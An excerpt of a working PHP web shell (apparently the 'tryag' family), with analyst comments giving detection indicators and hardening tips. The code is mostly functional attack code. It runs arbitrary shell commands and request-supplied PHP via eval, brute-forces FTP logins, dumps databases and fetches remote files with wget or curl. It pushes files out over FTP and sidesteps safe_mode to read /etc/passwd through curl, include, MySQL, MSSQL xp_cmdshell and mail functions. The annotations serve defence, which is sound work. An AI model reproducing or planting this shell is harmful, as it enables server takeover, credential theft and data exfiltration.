1969  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
1970  break;
1971  case fetch:
1972  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
1973  break;
1974  case lynx:
1975  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1976  break;
1977  case links:
1978  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1979  break;
1980  case GET:
1981  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
1982  break;
1983  case curl:
1984  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
1985  break;
1986  }
1987 }
// Analyst note: cmd=ftp_file_up / ftp_file_down moves a file between this host
// and an FTP server named in the request (server:port, default port 21, 10 s
// connect timeout), using PHP's ftp extension rather than an external client.
// Upload is an exfiltration path; download is a tool-staging path. fe() is
// defined elsewhere and is called on connect or login failure.
// Detection: FTP control connections originating from the web server.
1988 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
1989  {
1990  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
1991  if(empty($ftp_port)) { $ftp_port = 21; }
1992  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
1993  if(!$connection) { fe($language,0); }
1994  else
1995   {
1996   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }
1997   else
1998    {
// When the local target equals the current directory, the remote file's base name is appended.
1999    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
2000    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
2001    }
2002   }
2003  @ftp_close($connection);
2004  $_POST['cmd'] = "";
2005  }
// Analyst note: preparation for cmd=ftp_brute. Checks that the FTP server is
// reachable and loads a user list with get_users() (defined elsewhere; presumably
// local account names - confirm). If either step fails the command is cleared and
// the login loop further down does not run.
2006 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
2007  {
2008  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
2009  if(empty($ftp_port)) { $ftp_port = 21; }
2010  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
2011  if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }
2012  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
2013  @ftp_close($connection);
2014  }
2015 echo $table_up3;
// Analyst note: when no command is pending, a directory listing is the default:
// `dir` or `ls -lia` via the shell, or the PHP-only 'safe_dir' path under
// safe_mode. Every page view without a command therefore produces a listing.
2016 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
2017 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
// The pending command is echoed into the page without escaping; the textarea
// opened here is closed after the output stage.
2018 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
// Analyst note: output stage. Under safe_mode the shell avoids spawning processes
// and uses PHP extensions to read files or run commands indirectly (the 'test1'
// to 'test7' cases). Otherwise the pending command goes to ex(). safe_mode is a
// legacy setting (removed in PHP 5.4), so these cases target old installations.
// Hardening that addresses the cases below: unload unused extensions (curl, imap,
// mbstring mail functions, database clients), give web-application database
// logins no file or command privileges, and set open_basedir.
2019 if($safe_mode)
2020 {
2021  switch($_POST['cmd'])
2022  {
// Directory listing built from dir()/stat() instead of a shell command.
2023  case 'safe_dir':
2024   $d=@dir($dir);
2025   if ($d)
2026    {
2027    while (false!==($file=$d->read()))
2028     {
2029      if ($file=="." || $file=="..") continue;
2030      @clearstatcache();
2031      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
2032      if($windows){
2033      echo date("d.m.Y H:i",$mtime);
2034      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
2035      }
2036      else{
2037      $owner = @posix_getpwuid($uid);
2038      $grgid = @posix_getgrgid($gid);
2039      echo $inode." ";
2040      echo perms(@fileperms($file));
2041      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
2042      echo date("d.m.Y H:i ",$mtime);
2043      }
2044      echo "$file\n";
2045     }
2046    $d->close();
2047    }
2048   else echo $lang[$language._text29];
2049  break;
// Prints a POST-supplied file line by line with file(); output is HTML-escaped.
2050  case 'safe_file':
2051   if(@is_file($_POST['file']))
2052    {
2053    $file = @file($_POST['file']);
2054    if($file)
2055     {
2056     $c = @sizeof($file);
2057     for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
2058     }
2059    else echo $lang[$language._text29];
2060    }
2061   else echo $lang[$language._text31];
2062   break;
// Reads a local path through cURL's file:// scheme and echoes whatever
// curl_exec() returns, without escaping.
2063   case 'test1':
2064   $ci = @curl_init("file://".$_POST['test1_file']."");
2065   $cf = @curl_exec($ci);
2066   echo $cf;
2067   break;
// include() on a POST-supplied path: the file is emitted, and any PHP code in it
// is executed inside this request.
2068   case 'test2':
2069   @include($_POST['test2_file']);
2070   break;
// Reads a file through a local MySQL server: LOAD DATA INFILE into the scratch
// table temp_tryag_table, SELECT it back, then drop the table. This needs
// database credentials with the MySQL FILE privilege.
// Indicator: creation/drop of a table named temp_tryag_table.
2071   case 'test3':
2072   if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
2073   $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
2074   if($db)
2075    {
2076    if(@mysql_select_db($_POST['test3_md'],$db))
2077     {
2078      $sql = "DROP TABLE IF EXISTS temp_tryag_table;";
2079      @mysql_query($sql);
2080      $sql = "CREATE TABLE `temp_tryag_table` ( `file` LONGBLOB NOT NULL );";
2081      @mysql_query($sql);
2082      $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_tryag_table;";
2083      @mysql_query($sql);
2084      $sql = "SELECT * FROM temp_tryag_table;";
2085      $r = @mysql_query($sql);
2086      while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
2087      $sql = "DROP TABLE IF EXISTS temp_tryag_table;";
2088      @mysql_query($sql);
2089     }
2090     else echo "[-] ERROR! Can't select database";
2091    @mysql_close($db);
2092    }
2093   else echo "[-] ERROR! Can't connect to mysql server";
2094   break;
// Runs an operating-system command through a local MSSQL server's
// master.dbo.xp_cmdshell and captures the output in the scratch table
// tryag_temp_table. Despite the field name test4_file, the value is used as the
// command text. Keeping xp_cmdshell disabled and the login unprivileged blocks it.
// Indicator: a table named tryag_temp_table, xp_cmdshell calls from the web app login.
2095   case 'test4':
2096   if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
2097   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
2098   if($db)
2099    {
2100    if(@mssql_select_db($_POST['test4_md'],$db))
2101     {
2102      @mssql_query("drop table tryag_temp_table",$db);
2103      @mssql_query("create table tryag_temp_table ( string VARCHAR (500) NULL)",$db);
2104      @mssql_query("insert into tryag_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
2105      $res = mssql_query("select * from tryag_temp_table",$db);
2106      while(($row=@mssql_fetch_row($res)))
2107       {
2108       echo $row[0]."\r\n";
2109       }
2110     @mssql_query("drop table tryag_temp_table",$db);
2111     }
2112     else echo "[-] ERROR! Can't select database";
2113    @mssql_close($db);
2114    }
2115   else echo "[-] ERROR! Can't connect to MSSQL server";
2116   break;
// Passes "-C <file> -X /tmp/mb_send_mail" as extra mailer parameters to
// mb_send_mail() and then prints /tmp/mb_send_mail (presumably the mailer's
// config-file and log-file switches - confirm for the installed MTA).
// Indicator: a file named /tmp/mb_send_mail.
2117   case 'test5':
2118   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
2119   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
2120   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
2121   $lines = file ('/tmp/mb_send_mail');
2122   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
2123   break;
// Uses the imap extension with local paths instead of a mail server: imap_list()
// on a POST-supplied reference to enumerate entries.
2124   case 'test6':
2125   $stream = @imap_open('/etc/passwd', "", "");
2126   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
2127   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
2128   @imap_close($stream);
2129   break;
// Opens a POST-supplied path as an IMAP mailbox and echoes the body of message 1,
// without escaping.
2130   case 'test7':
2131   $stream = @imap_open($_POST['test7_file'], "", "");
2132   $str = @imap_body($stream, 1);
2133   echo $str;
2134   @imap_close($stream);
2135   break;
2136  }
2137 }
// Without safe_mode: any pending command other than the four reserved names is
// handed to ex(), and its output is HTML-escaped into the textarea. This is where
// the command strings assembled by the earlier handlers actually run.
// Detection: arbitrary child processes of the web-server account.
2138 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
2139  $cmd_rep = ex($_POST['cmd']);
2140  if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
2141  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
// Analyst note: FTP credential guessing. For each name in $users it opens a new
// connection and tries the name as its own password; with POST 'reverse' set it
// also tries the reversed name. Successes are printed, then attempt and success
// counts.
// Detection: bursts of FTP logins from the web host where the password equals the
// username (or its reverse). Mitigation: login throttling/lockout on the FTP
// service and a password policy that rejects username-derived passwords.
2142 if ($_POST['cmd']=="ftp_brute")
2143  {
2144  $suc = 0;
2145  foreach($users as $user)
2146   {
2147   $connection = @ftp_connect($ftp_server,$ftp_port,10);
2148   if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
2149   else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
2150   @ftp_close($connection);
2151   }
2152  echo "\r\n-------------------------------------\r\n";
// The reported attempt count is doubled when the reverse option is set.
2153  $count = count($users);
2154  if(isset($_POST['reverse'])) { $count *= 2; }
2155  echo $lang[$language.'_text97'].$count."\r\n";
2156  echo $lang[$language.'_text98'].$suc."\r\n";
2157  }
2158 if ($_POST['cmd']=="php_eval"){
      // Runs request-supplied PHP: the 'php_eval' POST field is passed to eval().
      // The two str_replace() calls only remove PHP open/close tags from the text
      // before it is evaluated; they are not an input filter.
      // Defender view: eval is a language construct, so the php.ini
      // disable_functions list does not block it. Useful signals are POST bodies
      // that carry cmd=php_eval together with a php_eval field, and static scans
      // for eval() fed from $_POST. The '@' operators suppress warnings from these
      // calls, so the PHP error log should not be relied on as the only evidence.
2159  $eval = @str_replace("<?","",$_POST['php_eval']);
2160  $eval = @str_replace("?>","",$eval);
2161  @eval($eval);}
2162 if ($_POST['cmd']=="mysql_dump")
2163  {
      // Table-dump branch. All connection parameters, the table name and the
      // optional output path come straight from the POST body. my_sql is a class
      // defined outside this excerpt; 'db' carries the value of the form's database
      // type selector (MySQL / MSSQL / PostgreSQL / Oracle).
      // Defender view: look for database logins from the web host that use accounts
      // other than the application's own, for bulk reads of whole tables, and for
      // unexpected dump files in web-writable directories (the form further down
      // prefills the name "dump.sql"). Least-privilege application accounts and
      // restricting which hosts may reach the database limit what this can read.
      // The output file is opened in "w" mode before the connection is attempted,
      // so a failed dump still leaves an empty, truncated file at the chosen path.
      // $fp is not closed anywhere in this block.
2164   if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
2165   $sql = new my_sql();
2166   $sql->db   = $_POST['db'];
2167   $sql->host = $_POST['db_server'];
2168   $sql->port = $_POST['db_port'];
2169   $sql->user = $_POST['mysql_l'];
2170   $sql->pass = $_POST['mysql_p'];
2171   $sql->base = $_POST['mysql_db'];
2172   if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
2173   else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
2174   else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
2175   else {
       // Either print the dump into the response or write it to the opened file.
2176    if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
2177    else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
2178    else { echo "[-] ERROR! Can't write in dump file"; }
2179    }
2180  }
2181 echo "</textarea></div>";
2182 echo "</b>";
2183 echo "</td></tr></table>";
2184 echo "<table width=100% cellpadding=0 cellspacing=0>";
2185 function up_down($id)
2186  {
      // Returns the HTML for the two collapse/expand icons placed in a panel header.
      // $id is the id of the <div> the icons control. Each <img> points back at this
      // script with ?img=1 or ?img=2 (presumably served by the script itself; that
      // handler is outside this excerpt). The onClick handlers hide or show the
      // element and store "<id>=0" or "<id>=1" in a cookie, which div() reads to
      // restore the panel state. Tooltips come from $lang entries _text109/_text110.
      // $_SERVER['PHP_SELF'] and $id are inserted without escaping.
      // Defender view: GET requests to a single PHP file with the bare query strings
      // ?img=1 and ?img=2 right after a page load are a recognisable artifact of
      // this page in web access logs.
2187  global $lang;
2188  global $language;
2189  return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';
2190  }
2191 function div($id)
2192  {
      // Returns the opening <div> tag for panel $id. The panel is emitted hidden
      // when a cookie named $id exists and compares equal to 0, otherwise visible.
      // The comparison is the loose '==', so on PHP versions before 8 a non-numeric
      // cookie value also compares equal to 0 and hides the panel.
      // $id is written into the attribute without escaping; every call visible in
      // this excerpt passes a literal such as 'id1'.
2193  if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
2194  return '<div id="'.$id.'">';
2195  }
2196 if(!$safe_mode){
     // Command panel. sr(), in() and ws() are layout helpers defined outside this
     // excerpt; judging by the arguments, in() emits an <input> of the given type
     // and name. This branch offers a free-text 'cmd' field plus a 'dir' field
     // prefilled with $dir. The dispatcher earlier in the file passes any 'cmd'
     // value it does not recognise to ex().
     // Defender view: POST requests to one script with 'cmd' and 'dir' fields, and
     // the web-server account spawning shells or system utilities, are the
     // behaviours to alert on. $safe_mode presumably mirrors PHP's old safe_mode
     // setting; confirm where it is assigned.
2197 echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;
2198 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
2199 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2200 echo $te.'</div>'.$table_end1.$fe;
2201 }
2202 else{
     // With $safe_mode set, only a directory field is offered and the hidden
     // 'cmd' value is fixed to 'safe_dir'.
2203 echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;
2204 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
2205 echo $te.'</div>'.$table_end1.$fe;
2206 }
2207 echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;
2208 echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
2209 echo $te.'</div>'.$table_end1.$fe;
2210 echo $fs.$table_up1.$lang[$language.'_text777'].up_down('id3').$table_up2.div('id3').$ts;
2211 echo sr(15,"<b>".$lang[$language.'_text888'].$arrow."</b>",in('text','u1p',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2212 echo $te.'</div>'.$table_end1.$fe;
2213 echo $fs.$table_up1.$lang[$language.'_text7777'].up_down('id3').$table_up2.div('id3').$ts;
2214 echo sr(15,"<b>".$lang[$language.'_text8888'].$arrow."</b>",in('text','Mohajer22',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2215 echo $te.'</div>'.$table_end1.$fe;
2216 echo $fs.$table_up1.$lang[$language.'_text999'].up_down('id3').$table_up2.div('id3').$ts;
2217 echo sr(15,"<b>".$lang[$language.'_text9999'].$arrow."</b>","<select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','string',60,(($_POST['string'])?($_POST['string']):("/etc/passwd"))).ws(2)."<b>".in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2218 echo $te.'</div>'.$table_end1.$fe;
2219 echo $fs.$table_up1.$lang[$language.'_text1010'].up_down('id3').$table_up2.div('id3').$ts;
2220 echo sr(15,"<b>".$lang[$language.'_text101010'].$arrow."</b>","<select name=plugin><option>cat /etc/passwd</option><option>/bin/ls</option><option>tempnam</option><option>/tmp</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):(""))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):(""))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
2221 echo $te.'</div>'.$table_end1.$fe;
2222 if($safe_mode){
2223 echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
2224 echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
2225 echo $te.'</div>'.$table_end1.$fe;
2226 }
2227 if($safe_mode && $unix){
2228 echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
2229 echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2230 echo $te.'</div>'.$table_end1.$fe;
2231 }
2232 if(!$safe_mode){
2233 foreach ($aliases as $alias_name=>$alias_cmd)
2234  {
2235  $aliases2 .= "<option>$alias_name</option>";
2236  }
2237 echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
2238 echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
2239 echo $te.'</div>'.$table_end1.$fe;
2240 }
2241 echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
2242 echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2243 echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2244 echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
2245 echo $te.'</div>'.$table_end1.$fe;
2246 if(!$safe_mode && $unix){
2247 echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
2248 echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
2249 echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
2250 echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
2251 echo $te.'</div>'.$table_end1.$fe;
2252 }
2253 echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
     // Form for the php_eval action: a textarea named 'php_eval' plus hidden fields
     // 'dir' and cmd=php_eval. The previous submission is echoed back into the
     // textarea without HTML escaping.
     // Defender view: the default text contains the strings "/* delete script */"
     // and unlink("tryagshell.php"), which are handy static-scan strings for this
     // family; the file name is only a default and may differ on a compromised host.
2254 echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
2255 echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"tryagshell.php\");\r\n//readfile(\"/etc/passwd\");"));
2256 echo "</textarea>";
2257 echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
2258 echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
2259 echo "</div></div></font>";
2260 echo $table_end1.$fe;
2261 if($safe_mode&&$curl_on)
2262 {
2263 echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
2264 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2265 echo $te.'</div>'.$table_end1.$fe;
2266 }
2267 if($safe_mode)
2268 {
2269 echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
2270 echo "<table class=table1 width=100% align=center>";
2271 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2272 echo $te.'</div>'.$table_end1.$fe;
2273 }
2274 if($safe_mode&&$mysql_on)
2275 {
2276 echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
2277 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
2278 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2279 echo $te.'</div>'.$table_end1.$fe;
2280 }
2281 if($safe_mode&&$mssql_on)
2282 {
     // Form for the 'test4' action, shown when $safe_mode and $mssql_on are both
     // set. It collects a database name, login, password and port (prefilled with
     // master / sa / password / 1433) and a command string (prefilled with "dir").
     // The 'test4' handler earlier in the file concatenates that string into an
     // "EXEC master.dbo.xp_cmdshell" statement and stages the output in a table
     // named tryag_temp_table.
     // Defender view: keep xp_cmdshell disabled, do not let the web tier hold
     // sysadmin-level SQL Server credentials, and rule out weak 'sa' passwords.
     // Audit SQL Server for xp_cmdshell use and for creation or removal of a table
     // called tryag_temp_table.
2283 echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
2284 echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
2285 echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2286 echo $te.'</div>'.$table_end1.$fe;
2287 }
2288 if($safe_mode&&$unix&&function_exists('mb_send_mail')){
2289 echo $fs.$table_up1.$lang[$language.'_text112'].up_down('id22').$table_up2.div('id22').$ts;
2290 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2291 echo $te.'</div>'.$table_end1.$fe;
2292 }
2293 if($safe_mode&&function_exists('imap_list')){
2294 echo $fs.$table_up1.$lang[$language.'_text113'].up_down('id23').$table_up2.div('id23').$ts;
2295 echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2296 echo $te.'</div>'.$table_end1.$fe;
2297 }
2298 if($safe_mode&&function_exists('imap_body')){
2299 echo $fs.$table_up1.$lang[$language.'_text114'].up_down('id24').$table_up2.div('id24').$ts;
2300 echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
2301 echo $te.'</div>'.$table_end1.$fe;
2302 }
2303 if(@ini_get('file_uploads')){
2304 echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
2305 echo $table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
2306 echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
2307 echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
2308 echo $te.'</div>'.$table_end1.$fe;
2309 }
2310 if(!$safe_mode&&!$windows){
2311 echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
2312 echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
2313 echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
